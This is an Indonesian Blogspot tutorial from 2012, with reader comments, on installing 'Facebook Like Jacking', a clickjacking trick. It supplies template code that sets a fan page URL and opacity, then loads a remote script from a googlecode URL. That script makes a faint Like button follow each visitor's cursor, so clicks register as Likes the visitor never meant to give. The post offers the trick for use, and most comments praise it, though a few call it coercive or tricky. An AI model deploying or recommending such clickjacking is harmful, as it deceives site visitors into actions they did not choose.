Facebook Twitter Google+ Pasang Iklan

Membuat Facebook Like Jacking Pada Blogspot


Cara Membuat Facebook Like Jacking Pada Blogspot - Sebelumnya saya telah mempublish Cara Like Otomatis Status Facebook lalu untuk kesempatan kali ini saya akan berikan artikel Membuat Facebook Like Jacking Pada Blogspot kepada anda semua yang ingin Fan Page anda banyak yang ngeLike.

Mempunyai Fans Page untuk Situs/Blog memang penting, tapi mencari orang agar meLike Fans Page kita susah susah gampang. Banyak cara yang dilakukan. Salah satunya adalah dengan menggunakan Facebook Like Jacking. Cara kerjanya adalah setiap ada visitor yang masuk ke situs/blog kita, maka tombol like akan mengikuti arah mouse dari pengunjung tersebut. Sehingga nantinya akan terjadi like sendiri.

Oke langsung saja bagi anda yang ingin menggunakan dan Membuat Facebook Like Jacking Pada Blogspot berikut ini langkah-langkah yang bisa langsung anda coba.

1. Seperti biasa edit template, letakan kode berikut ini diatas tag </head>
<script language='javascript'> var fan_page_url = 'http://www.facebook.com/NamaFansPageAnda'; var opacity = 0.6; var time = 60000; </script>
2. Letakan kode berikut ini dibawah tag <body> 
<script language='javascript' src='http://aldio-blog.googlecode.com/files/Like-Jacking.js'/>
3. Setelah itu klik Save Template

Demikian Cara Membuat Facebook Like Jacking Pada Blogspot kali ini. Jika diantara sobat ada yang masih bingung silahkan jangan malu-malu untuk bertanya.
Setelah baca jangan lupa jempolnya..makasih..


Artikel Terkait:

Anda sedang membaca artikel tentang Membuat Facebook Like Jacking Pada Blogspot dan anda bisa menemukan artikel Membuat Facebook Like Jacking Pada Blogspot ini dengan url http://dhio89.blogspot.com/2012/08/membuat-facebook-like-jacking-pada.html, dan terimakasih sudah membaca Membuat Facebook Like Jacking Pada Blogspot, semoga uraian dan pembahasan tentang Membuat Facebook Like Jacking Pada Blogspot Bisa Bermanfaat.

31 comments

August 26, 2012

Mantab tips like facebook jacking nya sobat...trimakasih atas berbagi ilmunya..

August 26, 2012

masih bingung dengan fungsinya sobat,,,

August 26, 2012

Wah, keren nih. dipraktekin nanti.

August 26, 2012

wahhh manteb nih sobat tutornya :)

August 26, 2012

wah ini untuk menggaet fans supaya banyak ya. keren nie. hehehe. simpen dulu ah siapa tau butuh :D

August 26, 2012

Jd main agak sedikit curang ya sob. Hehehehe...
Tp ngeselin jg sob, stiap kursor digeser, dia ngikutin. Kaya di kaskus jg iya tuh.

August 26, 2012

nat mau coba ah...

August 26, 2012

wah, tekniknya pemaksaan banget tuh! hehehehe..

August 26, 2012

ujung-ujung seperti menjebak pengunjung ya :)

August 26, 2012

keren mas broow ....

August 26, 2012

Oh jadi pengunjung bakal like fanpagenya walaupun pengunjung tidak berniat meneken tombol 'like' ya? Hmmm... :)

August 27, 2012

Dengan kita memasang like jacking pada blog tentunya akan lebih menarik pengunjung dari facebook untuk berkunjung ke blog ya sob..

August 27, 2012

wih,lain kali coba akh.,.
jangan lupa mampir baik XD
http://soroaqo.blogspot.com

August 27, 2012

ajib tenan sob........

August 27, 2012

kira2 trik ini mengganggu kenyamanan pengunjung gak sob?

August 27, 2012

mampir lagi sobat menyimak jacking like facebook sobat...

August 27, 2012

mantab sob tutorialnya, triknya memaksa pengunjung buat nglike ya.. :)

August 27, 2012

Mampir lagi sob.

August 27, 2012

kereenn mas.. akan dicoba.. soalnya pen asaran kalo gak disertakan demo. hehe.. makasih mas ya :)

August 27, 2012

jadi kaya sedikit maksa ya sob hehe..., nice post

August 27, 2012

bisa mas.. tapi jadi susah diklik, soalnya dibe;akang kursor mouse.. haha

August 27, 2012

kayaknya keren nih.. jadi prinsip kerjanya seakan akan memaksa secara halus untuk klik ya sob...

August 27, 2012

kalau sy sih, diemin aja yg ngelike dikit, tp mereka ikhlas, daripada gk ikhlas...

August 27, 2012

keren nih sob. bisa ngikutin mouse kemana aja, tapi kesannya maksa nih hehe

August 27, 2012

saya rasa kurang baik bagi blogger dan mesusahkan bagi pegunjung.

August 27, 2012

ud ane simpen gan, dulu sempet mutar muter nyari supaya banyak fansnya. ternyata ada di sni. tenkyu ya. :D

August 27, 2012

ud ane simpen gan. tinggal di coba doang. hehehe, nunggu waktu.

August 29, 2012

saya coba dulu...mungkin berhasil

October 10, 2012

wahahaha lumayan buat nambah likers :D

October 22, 2012

contohnya mana gan?

September 12, 2013

mantap gan! thank's infonya :D

Post a Comment

 
Jangan Lupa Follow Dan Like ya!
Ikuti @dhio89